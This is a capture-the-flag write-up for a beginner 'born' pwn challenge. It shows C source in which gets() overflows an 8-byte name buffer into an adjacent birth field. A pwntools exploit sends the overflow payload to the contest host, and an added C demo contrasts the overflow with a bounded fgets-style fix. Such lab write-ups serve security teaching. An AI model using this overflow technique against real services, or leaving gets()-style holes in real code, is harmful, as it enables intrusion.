CGCTF-born

Challenge link

After looking at the pwn problems in the fun contest I picked up a little, but going any deeper still beat me, so I figured I would start with the easiest ones on CGCTF first 2333.

Open test.c:

```c
#include <stdio.h>
#include <stdlib.h>   /* for system() */

struct Student {
    char name[8];     /* 8-byte buffer, no room for a terminator on an 8-char name */
    int birth;        /* sits right after name in memory */
};

int main(void) {
    setbuf(stdin, 0);
    setbuf(stdout, 0);
    setbuf(stderr, 0);
    struct Student student;
    printf("What\'s Your Birth?\n");
    scanf("%d", &student.birth);
    while (getchar() != '\n') ;
    if (student.birth == 1926) {
        printf("You Cannot Born In 1926!\n");
        return 0;
    }
    printf("What\'s Your Name?\n");
    gets(student.name);   /* unbounded read: anything past 8 bytes spills into birth */
    printf("You Are Born In %d\n", student.birth);
    if (student.birth == 1926) {
        printf("You Shall Have Flag.\n");
        system("cat flag");
    } else {
        printf("You Are Naive.\n");
        printf("You Speed One Second Here.\n");
    }
    return 0;
}
```

The birth year cannot be entered as 1926 (-1s), yet the flag is only printed when birth == 1926. Looking at the name prompt, the `gets` call has no length limit, while `name` is only an 8-character array that sits directly before `birth` in the struct. So entering more than 8 characters overwrites `birth`, and the bytes after the first 8 can set it to exactly 1926. The code:

```python
from pwn import *
sh = remote('ctf.acdxvfsvd.net', 1926)
sh.sendline(b'0')                      # any birth year other than 1926
sh.sendline(b'0' * 8 + p32(1926))      # fill name[8], then overwrite birth with 1926 (little-endian)
sh.interactive()
```
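As an added illustration (not part of the original writeup), the following C program models the struct layout described above: it checks that `birth` lives at byte offset 8, shows how an unbounded write of the 12-byte payload lands on `birth`, and contrasts it with a bounded, fgets-style reader that can never reach it. The unbounded case is modelled with a `memcpy` over the whole object so the demonstration itself has no undefined behaviour; the 1926 result assumes a little-endian target.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <stdint.h>

/* Same layout as the challenge's struct: 8 bytes of name, then a 4-byte int. */
struct Student {
    char name[8];
    int birth;
};

/* Layout check: birth sits right after name, so byte 8 of an overlong
   name lands on birth's first byte. */
size_t birth_offset(void) { return offsetof(struct Student, birth); }

/* Hardened reader (what fgets(name, sizeof name, stdin) gives you):
   at most sizeof(name)-1 bytes are copied and the buffer is always
   NUL-terminated, so birth is never touched. */
void read_name_bounded(struct Student *s, const char *input) {
    size_t n = strlen(input);
    if (n > sizeof(s->name) - 1) n = sizeof(s->name) - 1;
    memcpy(s->name, input, n);
    s->name[n] = '\0';
}

/* Model of the challenge's gets(): every input byte is written into the
   struct starting at name with no bound. Capped at the struct size here
   purely so the demo stays within the object. */
void read_name_unbounded(struct Student *s, const unsigned char *input, size_t len) {
    if (len > sizeof *s) len = sizeof *s;
    memcpy(s, input, len);
}

/* Constructed payload mirroring the writeup: 8 filler bytes, then 1926 as LE u32. */
size_t build_payload(unsigned char out[12]) {
    uint32_t v = 1926;
    memset(out, '0', 8);
    for (int i = 0; i < 4; i++) out[8 + i] = (unsigned char)(v >> (8 * i));
    return 12;
}

int birth_after_unbounded(void) {
    struct Student s = {0};
    unsigned char payload[12];
    size_t len = build_payload(payload);
    read_name_unbounded(&s, payload, len);
    return s.birth;   /* 1926: the overflow reached birth */
}

int birth_after_bounded(void) {
    struct Student s = {0};
    read_name_bounded(&s, "00000000\x86\x07");   /* same overlong input */
    return s.birth;   /* still 0: the bounded read stopped inside name */
}
```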

flag get
